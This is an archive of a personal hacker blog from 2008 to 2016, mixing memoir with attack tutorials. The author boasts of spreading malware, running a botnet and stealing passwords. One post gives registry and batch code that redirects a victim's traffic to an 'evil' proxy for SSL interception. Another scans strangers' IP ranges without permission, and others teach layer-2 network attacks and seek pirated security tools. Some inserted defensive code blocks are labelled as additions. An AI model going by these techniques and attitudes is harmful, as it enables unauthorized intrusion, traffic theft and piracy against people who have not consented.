
Thursday, December 22, 2016

Everyday Carry PenTest Edition

This is an everyday carry, but not in my pockets: in my man-purse, or briefcase as some have taken to calling it. The "bag" in question is a Kenneth Cole Reaction briefcase.

Within that I keep an Apple MacBook Air (Early 2014) running macOS Sierra. You may think that's insufficient power, but the lack of weight and the SSD more than compensate for anything left to be desired. In fact the only thing I noticed after ditching my (Debian) Dell XPS is that I lost a lot of weight but practically no computational power. And further within is yet another small case, and within that is where the magic lies:

So the tools most notably in here are a USB Rubber Ducky (for quickly injecting malware into hypothetical within-reach machines), a YARD Stick One (for hypothetically jamming wireless signals within its rating, or hypothetically intercepting rolling-code car fob door opens and starts), a USB SDR (for playing with software defined radio, and not cell signals), an Ubertooth (for Bluetooth operations), a host of USB fobs, and that concludes one side of the bag. [Most of these can be purchased at Hak5.] On the other side of the bag* I have various antennae for the aforementioned devices, an RFID card reader, some blank cards and keychains, and a set of door shims of varying thickness.

Within the briefcase I also have a black tie, because why not. And a mechanical keyboard. The keyboard may seem like overkill, but your fingers will thank you, and with the weight loss from moving from the Dell to the Apple, I don't notice the extra weight.

*Forgot the Turtle Lan Shell

For less potato, but more Linux / hacking pics, check out my Instagram.

Thursday, January 28, 2016

Confessions of a wanna be hacker

All I have ever wanted and strived to be is a grubby little hacker. Those three words are written indelibly in my mind:

grubby little hacker

Always lower case. In fiction they were smart; they were generally physically weaker than their antagonists. Clever won the day, though. I became enamored with the idea after getting my first computer, an IBM PS/1 486 at 25 MHz with both types of floppy drives. A machine that, when it's broken, doesn't get mad. You can work on it and not get yelled at. As long as you don't get angry you can keep trying any solution until it's fixed.

My first experience, fiction notwithstanding, with anything even "hacking" related was when I was young, probably the mid to late 90s. I needed a fresh install of Windows 95, and I didn't know what I was going to do. I didn't have an install disk from my current computer. I was telling my friends about my woes and one of them said no problem, he had a copy. His dad had a copy of Windows 95 on diskette. I don't remember the actual number of disks, but at like 12 years old I think I believed there were about 90 of them. But seriously, installing Windows 95 from diskette was an all-day experience. It took like 8 hours because the disks were slow and every so often you would have to change one out. I wouldn't see a Windows disk with a hologram on it for another 10 years. I think once we got it installed we hooked up a null modem and played Doom or something. Cause you know, there ain't no party like a null modem LAN party.*

About this same time I had my first dip into programming, thanks to a seriously outdated computer lab. It was the 90s, but they had a complete lab of fully working Apple IIes. They were awesome. I learned how to type in 6th grade and BASIC in 7th. By 8th they replaced the entire lab with the multicolored Macs. But I knew, after watching the cheesy "Don't copy that floppy" videos and various other warnings about hackerly things in the class, that's what I wanted. To own the machine.

We had the internet briefly at my home for a while, but my dad decided he didn't want to pay for it anymore. I ended up shoulder surfing dial-up account usernames and passwords from anyone who would let me near their computer. So I still had internet. At the time there was a free service called Juno that allowed you to connect to their service, download email, then immediately disconnect. I used this as a cover for my parents if they ever picked up the phone and heard the modem cranking away.

In 1999 I did my first Linux install. I stole the CD out of the back of a book from Books-A-Million... you know, cause it's difficult to download an OS over dialup. I didn't know how much different my life would be. My mentor and friend at the time had told me about Linux, and though he had some enthusiasm at first, he would eventually move to Windows 2000. I would as well, but I always kept a frankenbox with Linux on it; I knew it was going to be important. And my best friend at the time, whenever I was working on it or trying to learn my first scripting language (Perl), would call it "fake work."

In high school I was a decent student, but I never did homework. I kept a more or less A/B average :). At night I was sleeping 3, maybe 4 hours a night, either reading novels or tech manuals or working with the computer. In high school I got in trouble a bit more than I care to admit. One day I had written something the administration didn't like, and they informed me they were going to call my parents, so for the remainder of the week I tied up the phone with the modem. My principal asked me if I had told my parents about it; I said I had, and nothing else came of it.

The towers came down while I was in programming class. In that very same programming class a group of friends and I shoulder surfed the teacher's password. They all got in trouble for using the password at their desks. My machine showed no such usage.

High school ended. There was a breakup with a girl, and a Partition Magic accident. I decided I wasn't using computers anymore. My personal life got dark. A theme of things to come.

Two years after that decision, my dad told me to "get my shit together" or else, and suggested I start going to school somewhere. I briefly looked into medical assisting, ultimately deciding maybe I had to get back into computers again. There was a computer networking and security program, and I thought, security, and

grubby little hacker

echoed in my head again. During and after school my career would take off. In my downtime I wrote a piece of malware that I distributed as a credit card number generator (I still can't believe people downloaded and installed this thing), and created a small botnet, which I mostly used to harass the installers of the program with the VBScript voice on Windows.

I can remember the first time I used Metasploit to solve an actual real problem at a job. And I can remember, in between jobs, being poor and cracking wifi networks just for internet access. Shortly after I would write web scrapers for a semi-reputable company wanting to fill their databases with other people's data. And then managing cloud servers for high availability sites in the mid to late aughts. And then doing various dev and Linux admin roles. Still toiling away after hours on various projects, including shells or whatnot.

Am I a hacker? Did I become what I wanted? It doesn't really matter what anyone says; I don't think I'll ever believe it. I either have the worst case of impostor syndrome ever, or I will just keep striving for the unobtainable.

You know what, I don't think I've ever written an exploit...I think I'll go do that.

*To be honest I don't think we got Doom working, but we did get a file transfer going, much to the regret of FM radio listeners in a block radius.

Sunday, July 31, 2011

Bitcoins bitcoins bitcoins

I'm going to defcon soon and it seems there is only one lecture on bitcoins. This saddens me. I use Mt.Gox to do all my bitcoin transactions. Which is to say, convert my bitcoins into DOLLA DOLLA DOLLA bills. I am somewhat proud and somewhat ashamed to admit I am a bitcoin miner. As of right now I don't have any winning tips for you on how to be a miner. I will however introduce you to them.

Go here if you want to read the real version of what they are and how they work, instead of my dramatized, half fictional account: http://en.wikipedia.org/wiki/Bitcoin

Bitcoins are a currency based on cryptography, using various mathematics to prevent shenanigans. Bitcoin miners, people who provide proof of work for the bitcoin network, can actually acquire bitcoins. And bitcoins can be turned into dolla dolla dolla bills. So to do this proof of work you rent out your processor; ok, really you need to rent out your graphics card: ( https://en.bitcoin.it/wiki/Mining_hardware_comparison )

Whoa whoa whoa, why are all the cards ATI? Well, it turns out the function mostly used is SHA-256, and guess what, on ATI cards there is a specific asm instruction that helps with that.... WAY TO GO AMD.


So get a client to crunch this cryptography and start cracking away. Use poclbm if you've got graphics cards on the brain ( https://github.com/m0mchil/poclbm ). Now if you want to use CPUs, which by all accounts is at least 50 some odd times slower, you can still go for it: use RPCMiner for Mac and minerd for Linux. Join a mining pool like deepbit and start crackalackin away.

If you join a mining pool the rewards can come very fast....... but with very fast come very small rewards, lol.

CAVEATS:
OH AND ONE HUGE CAVEAT. This will eat electricity like a mother fucker. No joke: if you live in (worst case US scenario) Hawaii and have two rigs with 2 graphics cards apiece, your electric bill can go up over 200 dollars from what it normally is. LOL, that math is bad and terrible. For real math: ( http://www.pcper.com/reviews/Graphics-Cards/Bitcoin-Mining-Update-Power-Usage-Costs-Across-United-States ). This also makes crunching solely on CPUs pretty much a no-gain death trap, by my understanding.
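An added example, not part of the original post: a toy version of the proof of work the miners above are doing, double SHA-256 over an 80-byte block header with a nonce search, at a difficulty low enough to finish in well under a second. The header fields are constructed for the example and are not a real block.

```python
"""Toy Bitcoin-style proof of work (added example, not from the original post).

Miners hash an 80-byte block header with SHA-256 applied twice, changing the
4-byte nonce until the digest, read as a little-endian integer, is below a
target. The target used here is far easier than the real network's so the
search finishes instantly; the header fields are constructed, not a real block.
"""
import hashlib
import struct


def double_sha256(data: bytes) -> bytes:
    """SHA-256 applied twice, as Bitcoin does for block hashes."""
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


def build_header(version: int, prev_hash: bytes, merkle_root: bytes,
                 timestamp: int, bits: int, nonce: int) -> bytes:
    """Serialize the 80-byte header layout Bitcoin uses (little-endian fields)."""
    assert len(prev_hash) == 32 and len(merkle_root) == 32
    return (struct.pack("<I", version) + prev_hash + merkle_root
            + struct.pack("<III", timestamp, bits, nonce))


def header_value(header: bytes) -> int:
    """The block hash as the integer that gets compared against the target."""
    return int.from_bytes(double_sha256(header), "little")


def mine(version, prev_hash, merkle_root, timestamp, bits, target, max_nonce=2**32):
    """Search nonces until the header hash is below target; return (nonce, hash_int)."""
    for nonce in range(max_nonce):
        header = build_header(version, prev_hash, merkle_root, timestamp, bits, nonce)
        value = header_value(header)
        if value < target:
            return nonce, value
    # A real miner would change the timestamp or the merkle root and keep going.
    raise RuntimeError("nonce space exhausted")


# Constructed demo inputs: a 16-bit difficulty instead of the real network's.
DEMO_PREV = bytes(32)
DEMO_MERKLE = hashlib.sha256(b"constructed coinbase tx").digest()
DEMO_TIME = 1312070400
DEMO_BITS = 0x1D00FFFF
DEMO_TARGET = 2 ** (256 - 16)


def verify(nonce: int, target: int = DEMO_TARGET) -> bool:
    """Anyone can check a claimed nonce with one double-SHA256: that is the 'proof'."""
    header = build_header(1, DEMO_PREV, DEMO_MERKLE, DEMO_TIME, DEMO_BITS, nonce)
    return header_value(header) < target


if __name__ == "__main__":
    nonce, value = mine(1, DEMO_PREV, DEMO_MERKLE, DEMO_TIME, DEMO_BITS, DEMO_TARGET)
    print(f"nonce {nonce} gives hash {value:064x} (< 2^240)")
    print("verified:", verify(nonce))
```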

Monday, May 4, 2009

Who's going to defcon this year?

I AM WOOT!


If you want to meet up with me at sometime let me know.

Thursday, March 12, 2009

ZOMG My sign is on the internet.


DSC_0155, originally uploaded by jasonRmoore.

My sign at PodCamp Nashville 09. This is in someone else's Flickr and not just my usual self promotional bullshit.

Thursday, March 5, 2009

The Lazy Hacker Sniffing SSL traffic, maybe part 1:

So this is the first time I am posting before I've finished the project, so I am not certain if it works; I'll tell you in part 2. Anyway, you're probably thinking SSL is encrypted, so how are you going to do this? Well, we aren't going to break encryption. Instead we are going to send all their traffic to our evil proxy, which will fetch whatever certs the client was supposed to get. Our proxy gobbles up the real certs and hands the client machine a cert it made itself. So how are we going to do that? Well, we need to touch the client computer and do a registry edit. There are lots of languages you can do one in; I am just going to do this one in bat for time's sake. It requires one .reg file which should contain:


Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable"=dword:00000001
"ProxyServer"="myevilproxyserver.com"


And we should name it proxy.reg. And we will make one .bat file which will contain:


regedit.exe /s proxy.reg


You can also do this with the reg command and a hundred other ways, but this is how I did it. Ok, so that's all you need to do on the client machine; next week some time I will show you how to build the server that will eat this poor soul's traffic.
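An added check for the other side of this, not code from the original post: a small Python parser for .reg exports that flags the Internet Settings proxy values the file above sets whenever ProxyServer is not on an allowlist, which is how a defender would spot a quietly redirected client. The sample .reg text and the allowlist are constructed for the example.

```python
"""Audit a Windows .reg export for unexpected Internet Settings proxy entries.

Added example, not from the original post. It parses the two keys the post's
proxy.reg sets (ProxyEnable / ProxyServer under HKCU Internet Settings) and
reports a proxy that is not on an allowlist. The sample .reg text and the
allowlist are constructed for this example.
"""
import re

INTERNET_SETTINGS = (
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
)

# Constructed sample: the proxy.reg from the post, plus an unrelated key.
SAMPLE_REG = """Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings]
"ProxyEnable"=dword:00000001
"ProxyServer"="myevilproxyserver.com"

[HKEY_CURRENT_USER\\Software\\Example]
"Flag"=dword:00000000
"""

_KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
_VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<raw>.+)$')


def parse_reg(text):
    """Return {key_path: {value_name: value}} for a .reg export.

    Handles the two value types the post uses: dword:XXXXXXXX (hex) and
    quoted strings. Any other type is kept as its raw text.
    """
    keys = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        m = _KEY_RE.match(line)
        if m:
            current = m.group("key")
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            raw = m.group("raw")
            if raw.startswith("dword:"):
                value = int(raw[len("dword:"):], 16)
            elif raw.startswith('"') and raw.endswith('"'):
                value = raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
            else:
                value = raw
            keys[current][m.group("name")] = value
    return keys


def audit_proxy(text, allowed_proxies):
    """Return a list of findings for proxy settings the export would apply."""
    findings = []
    values = parse_reg(text).get(INTERNET_SETTINGS, {})
    enabled = values.get("ProxyEnable", 0) == 1
    server = values.get("ProxyServer")
    if enabled and server is None:
        findings.append("ProxyEnable set but no ProxyServer in the export")
    if enabled and server is not None:
        # ProxyServer may be "host:port" or "http=host:port;https=host:port".
        for entry in server.split(";"):
            host = entry.split("=", 1)[-1].split(":", 1)[0].strip().lower()
            if host not in allowed_proxies:
                findings.append(f"unexpected proxy server: {entry.strip()}")
    return findings


if __name__ == "__main__":
    for finding in audit_proxy(SAMPLE_REG, allowed_proxies={"proxy.corp.example"}):
        print(finding)
```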

Tuesday, December 23, 2008

Gentleman's MalWare license

With my blog entry about my bot I introduced the Gentleman's MalWare license, which is to say something very similar to the GPL, or equivalent to the Creative Commons license shown below.
This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License.

Tuesday, December 16, 2008

HackForums.net was rooted and 9unkz0r IRC went down

On the 14th hackforums.net was rooted, through what the administrator said was an old script with an easy exploit. The attackers were able to run a shell, according to the administrator. Hackertopsites.com, which runs on the same box, had links to the attackers' site c0rrupt.org/side. Not long after, irc.9unkz0r.com came under a DDoS attack by a user with the handle uid0. It is not known whether these are related. The IRC server is still being "quarantined" by routing the majority of packets to /dev/null. However some users are able to log on, if you just happen to be on one of the routes that is still up. It is unknown how long this outage will last. I also received a 514-message e-mail bomb. Luckily Gmail grouped them all together.

AS OF SEPTEMBER 30TH 2009 THERE IS NO HACKFORUMS; in lieu, please go to http://malvager.com

Saturday, December 13, 2008

Thoughts about hacking consumer grade wireless "routers".

People call those little things you connect to your cable or DSL modem wireless routers, but that's not really what they are. So what are they? They are part switch, part WAP (wireless access point), and part router. So you have four switch ports, and those are on one side of the routing, and one port is for the internet, which is on the other side of the routing. The WAP part is on the same side of the routing as the 4 switch ports, so all of that is behind the "router", which is doing Network Address Translation, or NAT, which is actually what is protecting you. Well, really we call it NAT but it's not really NAT; it's actually PAT, or Port Address Translation. So you're hiding behind a single IP, and only if your computer makes connections to the outside can connections from the outside come in.

[Diagram: Your Network --- router --- Intarweb]

**Yes the router has two IP's, that's how routing works silly**
**And x.x.x.x is an IP assigned by your ISP**

I was asked how to get through NAT, which is to say PAT, which is a layer of security the router inherently gives its users.

How do we break it so that connections from the outside can get in without having the internal network make the first move?

So the first thing isn't a hack, it's a feature of these "routers". It's called port forwarding, and what it does is take a port on a single computer on the internal network and put that port directly on the internet. For example, you start a home business running a website to sell candid shots of your girlfriend to the internet at large, or maybe you just want to have the candid shots and reap the benefits of having ads on the page selling them for 5 cents a click; well, that's beside the point, I don't care how you're exploiting your girlfriend, it's just important it gets done. Anyway, so you have your site hosted on your home computer; you will have to forward that port to your computer with the webserver running on it. If you forward that port on your router to your computer, then that port on the home PC is exposed to the world and all can get to it. If anything is port forwarded on your router, and that software is vulnerable to an exploit, like the webserver you are using, evil hackers can break that software and get into your computer. Or let's say you had 3389 (RDP) port forwarded on your Windows machine so that you could remote into it from the road, you know, to add more pics of your girl, or other girls who you had told you worked for Girls Gone Wild and were wondering if they would like to audition for a paying part in the new magazine you aren't heading up. Well, they could use TSGrinder or something else to brute force passwords.

So the evil hacker found your router and doesn't want to pay for your girlfriend's pics. The first thing he is going to do is a port scan, probably with nmap, and probably something like this:

nmap x.x.x.x -P0


**Being that x.x.x.x is your router's external IP**

**-P0 is saying don't send a ping to check if the box is alive. This is because most consumer grade wireless "routers" don't answer ICMP, because, well, I don't know, it's really stupid. There used to be this thing called the ping of death that could knock machines down, but all modern OSes and these consumer grade devices are patched against it, so I have no idea why they do this; if you ask me it's stupid because ICMP is a helpful troubleshooting tool. And as proof that smart people still use it, ping google: you will typically get 3 out of four of your ICMP packets back. Why don't you get one back? Hell if I know; I have some thoughts, but I don't work for Google and this post isn't about that. Also that is a capital P and a zero, not a capital O.**

Ok so this nmap may return some open ports; for the most part, if the ports are described as open, they are probably forwarded. So that gives you, errr, the evil hacker, his current points of interest. Then if there was software behind those ports he would try to break it. Ok moving on...

How can I get in if all ports are blocked? Well, if the router software itself is vulnerable I can use an exploit to break into it, and then use it to port forward inside of your network, or use it as a launching point for my nefarious deeds. How does the evil hacker do this.... beyond the scope of this post.

Next issue: if you download any malware it can run on your local machine and then make connections to other machines on the intarweb that can then control or alter your machine. NAT obviously can't protect you from your stupidity. Don't download garbage or you're fucked.

So the evil hacker knows where you live. Oh I know, scary.... well, you shouldn't have filled out the domain information for your girlfriend's bestiality porn website accurately; hackers use that stuff to figure shit like that out. So he drives to your house and he sits outside. Well, stupidly you left your wireless signal unencrypted, or you only used WEP... or smartly you used WPA, however your passphrase was a dictionary word.... retard.

So he cracked your shit. Well, why do you care? Because a very stupid company named Microsoft, in partnership with HP, made a protocol called SSDP. Why is SSDP stupid? Wiki says:

Quote: SSDP provides a mechanism which network clients can use to discover network services. Clients can use SSDP with little or no static configuration.

Wtf m8? Devices and software on your network CAN MAKE CHANGES TO YOUR FUCKING ROUTER. Meaning anyone who knows how to use SSDP can make a program that, if launched on the inside of your network, whether from your machine or a malicious machine that is on your wireless network, can configure your router to port forward to whatever it chooses.

Thanks M$ we really love you.
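An added example, not from the original post: the router announces that it accepts port mapping requests in its SSDP replies (ST header) and NOTIFY alives (NT header) as an InternetGatewayDevice or a WAN*Connection service, so a defender can find every device on the LAN that offers UPnP port mapping by parsing captured SSDP traffic. The SSDP messages below are constructed samples, not real captures.

```python
"""Find which devices on a LAN advertise UPnP IGD (port mapping) over SSDP.

Added example, not from the original post. SSDP replies carry the service type
in ST, NOTIFY alives carry it in NT; the InternetGatewayDevice device type and
the WANIPConnection / WANPPPConnection service types are the ones that expose
AddPortMapping. The messages below are constructed samples.
"""
from urllib.parse import urlparse

# UPnP IGD identifiers whose presence means "this thing accepts port mappings".
IGD_MARKERS = (
    "urn:schemas-upnp-org:device:InternetGatewayDevice:",
    "urn:schemas-upnp-org:service:WANIPConnection:",
    "urn:schemas-upnp-org:service:WANPPPConnection:",
)

# Constructed samples: an M-SEARCH reply from a router, a NOTIFY from a media
# server (harmless), and a NOTIFY from a second box exposing WANIPConnection.
SAMPLE_MESSAGES = [
    "HTTP/1.1 200 OK\r\n"
    "CACHE-CONTROL: max-age=1800\r\n"
    "LOCATION: http://192.168.1.1:1900/igd.xml\r\n"
    "SERVER: Linux/2.6, UPnP/1.0, Constructed/1.0\r\n"
    "ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    "USN: uuid:00000000-0000-0000-0000-000000000001::"
    "urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    "\r\n",
    "NOTIFY * HTTP/1.1\r\n"
    "HOST: 239.255.255.250:1900\r\n"
    "LOCATION: http://192.168.1.20:8200/rootDesc.xml\r\n"
    "NT: urn:schemas-upnp-org:device:MediaServer:1\r\n"
    "NTS: ssdp:alive\r\n"
    "USN: uuid:00000000-0000-0000-0000-000000000002::"
    "urn:schemas-upnp-org:device:MediaServer:1\r\n"
    "\r\n",
    "NOTIFY * HTTP/1.1\r\n"
    "HOST: 239.255.255.250:1900\r\n"
    "LOCATION: http://192.168.1.254:5000/rootDesc.xml\r\n"
    "NT: urn:schemas-upnp-org:service:WANIPConnection:1\r\n"
    "NTS: ssdp:alive\r\n"
    "USN: uuid:00000000-0000-0000-0000-000000000003::"
    "urn:schemas-upnp-org:service:WANIPConnection:1\r\n"
    "\r\n",
]


def parse_ssdp(message: str) -> dict:
    """Return {'start': first line, HEADER-NAME: value, ...} for one SSDP message."""
    lines = message.split("\r\n")
    parsed = {"start": lines[0]}
    for line in lines[1:]:
        if not line:
            break  # the blank line ends the header block
        name, _, value = line.partition(":")
        parsed[name.strip().upper()] = value.strip()
    return parsed


def igd_advertisers(messages):
    """Map each advertising host (taken from LOCATION) to the IGD type it announced."""
    found = {}
    for msg in messages:
        hdr = parse_ssdp(msg)
        if hdr.get("NTS", "ssdp:alive") == "ssdp:byebye":
            continue  # the device is leaving, not offering the service
        target = hdr.get("ST") or hdr.get("NT", "")
        if any(target.startswith(marker) for marker in IGD_MARKERS):
            host = urlparse(hdr.get("LOCATION", "")).hostname or "unknown"
            found[host] = target
    return found


if __name__ == "__main__":
    for host, kind in sorted(igd_advertisers(SAMPLE_MESSAGES).items()):
        print(f"{host} offers port mapping via {kind}; disable UPnP there if it is not needed")
```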

Ok now that that's over, how do you guys like this style of post?

Tuesday, November 4, 2008

On this the day we elect our leader.



Diebold makes shitty machines, they always have, and they won't open the code. But they like open standards for ATMs? You can find what voting machines your state used here. In KY they use Hart InterCivic machines, but Diebold and another voting machine company still have vulnerabilities. I was going to go on a diatribe about what I thought this means, but I think you guys should draw your own conclusions about voting; maybe I will post my opinion tomorrow.

Tuesday, June 10, 2008

Big boy hacking, or The anatomy of the vulnerabilities on a network from a layer 2 and beyond perspective.

Layer 2 is really the sweet spot. I know on any network, when I get there, I have them. Okay, so what's vulnerable on a network you have layer 2 access to? EVERYTHING. Switches, routers, firewalls, "security appliances", client computers, servers, hell, printers; some printers have fucking Active Directory users! I can't tell you how many times I have gone into a place and told the sysadmin that the switches still had a default password on them and he said "Those switches have an interface?"
Ignorance is how you win the war. The sysadmin's ignorance vs. your knowledge.
There are times to be a pirate and times to be a ninja; this is a ninja time. Stealth, use it. Ok so you want a layout of the network, so.... hey, fuckin' stop it, I saw you grabbing that AngryIP scanner, no, put that down. IP scans will set off a well configured IDS or IPS. So let's be a little more subtle: let's do an ARP scan, and only five machines at a time. With something like Cain it will try to give you the name of the company that the MAC address is from, so you can try to separate the computers from switches and printers and the like. Ok, now if you have done your research on this place you need to ask yourself how many computers they should have, and compare this to your scan. If your scan is way low they may spread themselves over multiple subnets and/or VLANs. Ok, so always have a default password list with you. Your easiest targets on the network are the traffic itself and the devices admins don't think about, i.e. switches and printers. So if you can make yourself a trunk port on a switch you don't even have to ARP poison the damn thing to get all those sweet nuggety passwords. If you just want to do a denial of service you can just put the switch in a loop. There are a host of switch attacks. Check out VLAN hopping. Printers have buffer overflows just like anything else.
So this tutorial supposes you have layer 2 access. Well, if you have physical access to one of the machines you could use any number of USB tricks to steal network credentials. But if you don't, it's going to be hard because Active Directory uses Kerberos 5 to protect its passwords; your best bet is to look for an NT4 machine that just uses LanMan. EVERY NETWORK has an NT4 machine; it's just in the closet and nobody remembers it until some archaic piece of accounting software breaks. So if you can, just poison that guy and the computers it seems to be talking to (probably accounting machines or a server). Also just observe as much of the infrastructure as you can. It will teach a lot. Well, there is a lot more, like what to do with routers / servers / "security devices", but really this is more about the take 'em down low where they don't see.
And I bet you thought I was going to talk about the new iPhone today.


Thursday, April 24, 2008

nmap lesson 2 (beginner)

Ok so you know how to nmap:
nmap 192.168.1.1
and you know how to nmap -P0 -O:
nmap 192.168.1.1 -P0 -O
So now you want to know more. Ok, so let's find out your IP address. If you are in Windows do an ipconfig; if you are in *nix do an ifconfig. Ok so typically you're behind a wireless router or something if you have cable or DSL. If your address is in any of these ranges:
10.0.0.0 to 10.255.255.255
172.16.0.0 to 172.31.255.255
192.168.0.0 to 192.168.255.255
that means you have a private IP address and that your router navigates the internet for you using NAT (PAT technically). So you need to find your publicly routable address. To find this, go to ipchicken.com and it will tell you your external IP. So let's say your IP is 68.52.155.53. Ok, take this address and run it through arin.net, or ripe.net if you are in Europe, or afrinic if you are in Africa, etc.
Ok so my address gives me two possible selections for Comcast:
Comcast Cable Communications, Inc. JUMPSTART-1 (NET-68-32-0-0-1)
68.32.0.0 - 68.63.255.255
Comcast Cable Communications, Inc. NASHVILLE-3 (NET-68-52-128-0-1)
68.52.128.0 - 68.52.159.255

I am going to choose the Nashville one because that is where I am at and it is a smaller range.
So I want to narrow my range down as much as possible so I have fewer results to look at. So I want to scan IPs that are near mine, because most likely those are other Comcast customers and potentially even my neighbors. So I want to scan the range 68.52.155.x; x is going to stand for 0 through 255. I also want to output this to a text file so that I can review it later, because it is going to take a long time. So here is my command:
nmap 68.52.155.0/24 -P0 -O -oN bob.txt
This will output everything to bob.txt in the current directory.
Next lesson: interpreting ports.
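An added example, not from the original post, that does this lesson's range reasoning in Python: the three private ranges, the /24 derived from 68.52.155.53, and a check that the /24 sits entirely inside the NASHVILLE-3 allocation quoted above (i.e. inside the range you have confirmed is your own). The addresses and ranges are the ones from the post.

```python
"""Private-address check and /24 scoping for the nmap lesson above.

Added example, not from the original post. It uses the three private ranges
and the two ARIN allocations the post lists, and derives the same /24 the post
builds from 68.52.155.53.
"""
import ipaddress

# The three private ranges listed in the post (RFC 1918).
PRIVATE_RANGES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]

# The two allocations the post got back from ARIN for 68.52.155.53.
ARIN_RESULTS = {
    "JUMPSTART-1": ("68.32.0.0", "68.63.255.255"),
    "NASHVILLE-3": ("68.52.128.0", "68.52.159.255"),
}


def is_private(ip: str) -> bool:
    """True if the address is in one of the ranges the post says mean 'behind NAT/PAT'."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in PRIVATE_RANGES)


def local_slash24(ip: str) -> ipaddress.IPv4Network:
    """The /24 around an address, e.g. 68.52.155.0/24 for 68.52.155.53."""
    return ipaddress.ip_network(f"{ip}/24", strict=False)


def allocations_containing(ip: str):
    """Names of the allocations whose first-last range contains ip, smallest first."""
    addr = ipaddress.ip_address(ip)
    hits = []
    for name, (first, last) in ARIN_RESULTS.items():
        lo, hi = ipaddress.ip_address(first), ipaddress.ip_address(last)
        if lo <= addr <= hi:
            hits.append((int(hi) - int(lo) + 1, name))
    return [name for _, name in sorted(hits)]


def range_inside_allocation(net: ipaddress.IPv4Network, name: str) -> bool:
    """Check that every address of the /24 falls inside the named allocation."""
    first, last = ARIN_RESULTS[name]
    lo, hi = ipaddress.ip_address(first), ipaddress.ip_address(last)
    return lo <= net[0] and net[-1] <= hi


if __name__ == "__main__":
    mine = "68.52.155.53"
    print("private:", is_private(mine))
    net = local_slash24(mine)
    print("scan range:", net.with_prefixlen)
    for name in allocations_containing(mine):
        print(f"{name}: whole /24 inside = {range_inside_allocation(net, name)}")
```

Note that -P0 in the commands above is the old spelling; current nmap versions call the same option -Pn.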

Monday, April 14, 2008

Hacking Flickr's metric "Interestingness"

The best blog I have seen on this so far is the SEO of the sea. And the best part of that is describing the patent:

Interestingness rank is based in part on:

* The quantity of user-entered metadata concerning the media object,
* The number of users who have assigned metadata to the media object,
* An access pattern related to the media object,
* A lapse of time related to the media object, and/or;
* On the relevance of metadata to the media object.
* Whether the media contains undesirable content such as obscene imagery or promotions of a competitor’s product.

Another good one is the All About Content blog. So the one place these two fundamentally disagree is the focus on WHICH USERS look at your Flickr.

Ok so I have been doing some really "casual" interestingness tests, but I haven't done anything hardcore. However, I am ready to: I am going to start building a Python tool using beej's flickr API and see if I can't narrow it down a little better and give a little more clarity to the metric. I don't know if I will be able to get any good numbers out of this, but I will learn something about the metric and have a good time.

Sunday, April 6, 2008

Easy System Administrator Security Blunders

Fatal System Administrator Mistakes
System administration can be a stressful and tedious job. This leads admins who are either poorly educated or overworked to make some very simple mistakes out of convenience, franticness, or frustration.

In a large enough environment, most companies make use of Active Directory. This cuts down on the amount of work a sysadmin has to do for shared resources through centralized authentication. Which means most boxes in the corporate environment have two administrators (3 if you count the domain admin). One is the normal user who comes in and authenticates through AD transparently on his/her box. The other is the local Administrator of the box that was used to set up the machine; most sysadmins do not remove or disable this account. And most sysadmins use the same password for this account consistently, and it's usually not a really sophisticated password.

Consider looking at:
http://ophcrack.sourceforge.net/
http://www.mininova.org/tor/183001
http://wiki.hak5.org/wiki/USB_Hacksaw
**Can't vouch for the torrent sites**


In a small to medium business, sometimes there is a crunch for budget, and either the IT guy is really crunched for time or there is no IT guy, so the responsibility for the web server falls to either a web developer or a web designer. Most of these guys know what they are doing, but there's a portion of them that, when they hear security, think "I don't have any MySQL injection points on my webpage," not "maybe I shouldn't just set the webserver outside the firewall." A lot of web guys put servers outside of firewalls, or just forward enough ports to make the firewall ineffective, because it makes their job easier. Now a hardened FreeBSD box sitting outside a firewall is one thing, but a Windows Server 2000 box with the majority of ports turned to the internet is quite another, particularly if that box is doing more than web serving. Being that it's a web server, there is probably a reluctance to update because of downtime as well.

Consider looking at:
http://www.metasploit.com/
Core Impact(If someone finds a torrent for this let me know so I can post it)
Canvas(If someone finds a torrent for this let me know so I can post it)
**Can't vouch for torrent sites**

Not training employees to understand when it is ok to disclose their password and when not to can be a problem as well. We have all heard the example of the sticky note with the password right by the computer; however, other helps in social engineering are just reading the site and looking at the staff directory. Maybe visit the site to see how the physical security is; imagine if there was an RJ45 port exposed, just hook up and set a small AP behind a chair and you're in. And if you are into it, go ahead and do some trashing: just grab some bags from their dumpster and see if anyone threw out one of those sticky notes you hear so much about.

Consider:
Visiting Web site
Visiting Physical Site

So those are three mistakes you might look for that an overworked or underworking IT pro might make.

Friday, April 4, 2008

Community Building

I interviewed a buddy of mine who runs therabbithole.ws, we met on hackforums.net, and I knew immediately I was going to like this guy. He started the rabbithole shortly after I met him(to my understanding :) ). And he has done such an excellent job community building I wanted to ask him about it so without further ado, haxor.much:

What are your future planned projects, elaborate if you can.

I have amazing things planned out for TRH and its members. The staff and I are going to implement some sort of downloading section and we are going to get some streaming hacking videos on a separate forum page. Also, I am making a WAP version of the forums so that members can view it from their phone. So many projects....

What has been your hardest struggle with getting therabbithole.ws community together and keeping them together?

I would have to say immature members who strive for a power position. It's something every admin is going to have to go through; that's why you get yourself a good forum team to answer those questions so you can keep the site running.

When you think of therabbithole.ws community do you think of them as a tight group? Or are they a loose group with their own alliances and enemies?

I think that the family ambiance at the forums is pretty high for most members. There are of course others who are very active on other boards and visit TRH from time to time but all in all, we are pretty tight.

What's your favorite website that you have not authored?

Hmmm this is a tough one. Any intelligent hacker would say Google, although milw0rm is right up there too.

I don't hear about f33r.com or infinityandthevoid, how are they doing?

